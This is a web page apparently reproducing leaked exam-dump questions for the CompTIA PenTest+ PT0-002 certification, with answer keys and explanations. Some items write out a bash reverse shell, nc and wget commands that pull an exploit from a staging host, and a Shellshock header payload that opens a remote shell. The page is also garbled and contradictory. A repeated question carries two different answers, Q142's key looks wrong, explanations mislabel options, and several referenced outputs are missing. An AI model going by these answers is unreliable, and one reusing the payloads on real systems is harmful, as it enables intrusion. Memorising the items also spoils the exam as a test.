[Jun 22, 2024] Free CompTIA PenTest+ PT0-002 Exam Question [Q126-Q145]

[Jun 22, 2024] Free CompTIA PenTest+ PT0-002 Exam Question

PT0-002 dumps & CompTIA PenTest+ sure practice dumps

CompTIA PT0-002 exam focuses on various domains of penetration testing, including planning and scoping, information gathering and vulnerability identification, attacks, and exploits, and reporting and communication. The test-takers must have in-depth knowledge of different testing tools, techniques, and methodologies used to identify and exploit vulnerabilities in the target systems. They should have good communication and interpersonal skills to interact with the stakeholders regarding the vulnerabilities detected and provide guidance on remediation and mitigation plans.

CompTIA PenTest+ exam is intended for professionals who have a minimum of three years of experience in an IT-related role, with a focus on security. CompTIA PenTest+ Certification certification exam validates the skills required for effective penetration testing and can increase employability in the IT security job market. The PT0-002 exam covers topics such as planning and scoping, reconnaissance, vulnerability identification, exploiting vulnerabilities, post-exploitation techniques, and reporting and communication. Certified professionals can demonstrate to employers that they have the knowledge and skills required to protect systems and networks from cyber threats.

 

NEW QUESTION # 126
Which of the following describes how a penetration tester could prioritize findings in a report?

• A. Network infrastructure
• B. Cyberthreats
• C. Business mission and goals
• D. Cyberassets

Answer: C

Explanation:
Prioritizing findings in a penetration test report should align with the business mission and goals. Understanding the business context allows a penetration tester to assess the impact of vulnerabilities in relation to the organization's critical functions and assets. This approach ensures that recommendations are not only technically sound but also relevant and actionable within the business's strategic framework. Options B, C, and D (Cyberassets, Network infrastructure, and Cyberthreats) are important factors but should be considered within the context of how they affect the business's mission and goals.

NEW QUESTION # 127
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
Which of the following best describes the NEXT step in the engagement?

• A. Scheduling of follow-up actions and retesting
• B. Attestation of findings and delivery of the report
• C. Acceptance by the client and sign-off on the final report
• D. Review of the lessons learned during the engagement

Answer: B

NEW QUESTION # 128
Penetration tester is developing exploits to attack multiple versions of a common software package. The versions have different menus and )ut.. they have a common log-in screen that the exploit must use. The penetration tester develops code to perform the log-in that can be each of the exploits targeted to a specific version. Which of the following terms is used to describe this common log-in code example?

• A. Conditional
• B. Sub application
• C. Dictionary
• D. Library

Answer: D

Explanation:
The term that is used to describe the common log-in code example is library, which is a collection of reusable code or functions that can be imported or called by other programs or scripts. A library can help simplify or modularize the code development process by providing common or frequently used functionality that can be shared across different programs or scripts. In this case, the penetration tester develops a library of code to perform the log-in that can be imported or called by each of the exploits targeted to a specific version of the software package. The other options are not valid terms that describe the common log-in code example. Conditional is a programming construct that executes a block of code based on a logical condition or expression, such as if-else statements. Dictionary is a data structure that stores key-value pairs, where each key is associated with a value, such as a Python dictionary. Sub application is not a standard programming term, but it may refer to an application that runs within another application, such as a web application.

NEW QUESTION # 129
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

• A. Cross-site scripting
• B. Ransomware attacks
• C. Injection flaws
• D. Race-condition attacks
• E. Buffer overflows
• F. Zero-day attacks

Answer: A,C

Explanation:
Explanation
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring

NEW QUESTION # 130
In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

• A. Perform a reverse DNS query and match to the service banner.
• B. Test for RFC-defined protocol conformance.
• C. Attempt to brute force authentication to the service.
• D. Check for an open relay configuration.

Answer: A

NEW QUESTION # 131
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

• A. Enforce enhanced password complexity requirements.
• B. Disable or upgrade SSH daemon.
• C. Disable HTTP/301 redirect configuration.
• D. Implement a better method for authentication.
• E. Create an out-of-band network for management.
• F. Eliminate network management and control interfaces.

Answer: D,E

Explanation:
The key findings indicate that the network device is vulnerable to several attacks, such as sniffing, brute-forcing, or exploiting the SSH daemon. To prevent these attacks, the best recommendations are to create an out-of-band network for management, which means a separate network that is not accessible from the production network, and to implement a better method for authentication, such as SSH keys or certificates.
The other options are not as effective or relevant.

NEW QUESTION # 132
A penetration tester runs the following command:
l.comptia.local axfr comptia.local
which of the following types of information would be provided?

• A. The DHCP scopes and ranges used on the network
• B. The hostnames and IP addresses of internal systems
• C. The DNSSEC certificate and CA
• D. The OS and version of the DNS server

Answer: B

Explanation:
The command dig @ns1.comptia.local axfr comptia.local is a command that performs a DNS zone transfer, which is a process of copying the entire DNS database or zone file from a primary DNS server to a secondary DNS server. A DNS zone file contains records that map domain names to IP addresses and other information, such as mail servers, name servers, or aliases. A DNS zone transfer can provide useful information for enumeration, such as the hostnames and IP addresses of internal systems, which can help identify potential targets or vulnerabilities. A DNS zone transfer can be performed by using tools such as dig, which is a tool that can query DNS servers and obtain information about domain names, such as IP addresses, mail servers, name servers, or other records1. The other options are not types of information that would be provided by a DNS zone transfer. The DNSSEC certificate and CA are not part of the DNS zone file, but rather part of the DNSSEC protocol, which is an extension of the DNS protocol that provides authentication and integrity for DNS data. The DHCP scopes and ranges used on the network are not part of the DNS zone file, but rather part of the DHCP protocol, which is a protocol that assigns dynamic IP addresses and other configuration parameters to devices on a network. The OS and version of the DNS server are not part of the DNS zone file, but rather part of the OS fingerprinting technique, which is a technique that identifies the OS and version of a remote system by analyzing its responses to network probes.

NEW QUESTION # 133
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

• A. Attestation of findings and delivery of the report
• B. Scheduling of follow-up actions and retesting
• C. Acceptance by the client and sign-off on the final report
• D. Review of the lessons learned during the engagement

Answer: C

NEW QUESTION # 134
A penetration testing firm performs an assessment every six months for the same customer. While performing network scanning for the latest assessment, the penetration tester observes that several of the target hosts appear to be residential connections associated with a major television and ISP in the area. Which of the following is the most likely reason for the observation?

• A. The penetration tester misconfigured the network scanner.
• B. The IP ranges changed ownership.
• C. The network scanning tooling is not functioning properly.
• D. The network scanning activity is being blocked by a firewall.

Answer: B

Explanation:
When a penetration tester notices several target hosts appearing to be residential connections associated with a major television and ISP, it's likely that the IP ranges initially assigned to the target organization have changed ownership and are now allocated to the ISP for residential use. This can happen due to reallocation of IP addresses by regional internet registries. Misconfiguration of the scanner (option A), malfunctioning of scanning tools (option B), or firewall blocking (option D) would not typically result in the discovery of residential connections in place of expected organizational targets.

NEW QUESTION # 135
A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR." Which of the following attacks is being attempted?

• A. Remote command injection
• B. SQL injection
• C. DLL injection
• D. HTML injection

Answer: B

Explanation:
WAITFOR can be used in a type of SQL injection attack known as time delay SQL injection or blind SQL injection34. This attack works on the basis that true or false queries can be answered by the amount of time a request takes to complete. For example, an attacker can inject a WAITFOR command with a delay argument into an input field of a web application that uses SQL Server as its database. If the query returns true, then the web application will pause for the specified period of time before responding; if the query returns false, then the web application will respond immediately. By observing the response time, the attacker can infer information about the database structure and data1.
Based on this information, one possible answer to your question is A. SQL injection, because it is an attack that exploits a vulnerability in a web application that allows an attacker to execute arbitrary SQL commands on the database server.

NEW QUESTION # 136
Which of the following tools would be the best to use to intercept an HTTP response at an API, change its content, and forward it back to the origin mobile device?

• A. Android SDK Tools
• B. Drozer
• C. MobSF
• D. Burp Suite

Answer: D

Explanation:
Burp Suite is a web application security testing tool that can intercept, modify, and forward HTTP requests and responses. It can be used to manipulate the data sent between an API and a mobile device, such as changing the content of the response before it reaches the device. Drozer is a framework for Android security assessment, but it does not intercept HTTP traffic. Android SDK Tools are a set of tools for developing Android applications, but they do not have the functionality to intercept and modify HTTP responses. MobSF is a mobile security framework that can perform static and dynamic analysis of Android and iOS applications, but it does not have the capability to intercept and change HTTP responses at an API level. Reference: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 8: Application Testing1; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 8: Application Testing2; Burp Suite Documentation3

NEW QUESTION # 137
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

Which of the following is the penetration tester conducting?

• A. Brute force
• B. DoS attack
• C. Port scan
• D. Credential stuffing

Answer: A

Explanation:
The output shows multiple login attempts with different passwords for the same username "root" on the IP address 192.168.1.112. This is indicative of a brute force attack, where an attacker systematically tries various password combinations to gain unauthorized access. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 4: Conducting Passive Reconnaissance; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 4: Conducting Active Reconnaissance.

NEW QUESTION # 138
During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise.
While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

• A. Disable NIC.
• B. List processes.
• C. Spawn a local shell.
• D. Change the MAC address

Answer: C

Explanation:
The script author was trying to spawn a local shell by using the os.system() function, which executes a command in a subshell. The command being executed is "/bin/bash", which is the path to the bash shell, a common shell program on Linux systems. The script author may have wanted to spawn a local shell to gain more control or access over the compromised system, or to execute other commands that are not possible in the original shell. The other options are not plausible explanations for what the script author was trying to do.

NEW QUESTION # 139
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

• A. MD5
• B. PBKDF2
• C. SHA-1
• D. bcrypt

Answer: A

NEW QUESTION # 140
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

Which of the following is the penetration tester conducting?

• A. Brute force
• B. DoS attack
• C. Port scan
• D. Credential stuffing

Answer: A

Explanation:
The output shows multiple login attempts with different passwords for the same username "root" on the IP address 192.168.1.112. This is indicative of a brute force attack, where an attacker systematically tries various password combinations to gain unauthorized access. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 4: Conducting Passive Reconnaissance; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 4: Conducting Active Reconnaissance.

NEW QUESTION # 141
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

• A. bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
• B. powershell -exec bypass -f \\10.10.51.50\9891
• C. nc 10.10.51.50 9891 < exploit
• D. wget 10.10.51.50:9891/exploit

Answer: D

NEW QUESTION # 142
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":
"text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

• A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept":
  "text/html,application/xhtml+xml,application/xml"}
• B. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept":
  "text/html,application/xhtml+xml,application/xml"}
• C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept":
  "text/html,application/xhtml+xml,application/xml"}
• D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept":
  "text/html,application/xhtml+xml,application/xml"}

Answer: A

NEW QUESTION # 143
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.
INSTRUCTIONS
Select the appropriate answer(s), given the output from each section.
Output 1

Answer:

Explanation:
See all the solutions below in Explanation
Explanation:

NEW QUESTION # 144
A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?

• A. nmap -n 192.168.0.1-254
• B. nmap -N 192.168.0.0/24
• C. nmap -n 192.168.0.1/16
• D. nmap -n 192.168.0.1 192.168.0.1.254

Answer: A

NEW QUESTION # 145
......

CompTIA PT0-002 Actual Questions and Braindumps: https://freetorrent.actual4dumps.com/PT0-002-study-material.html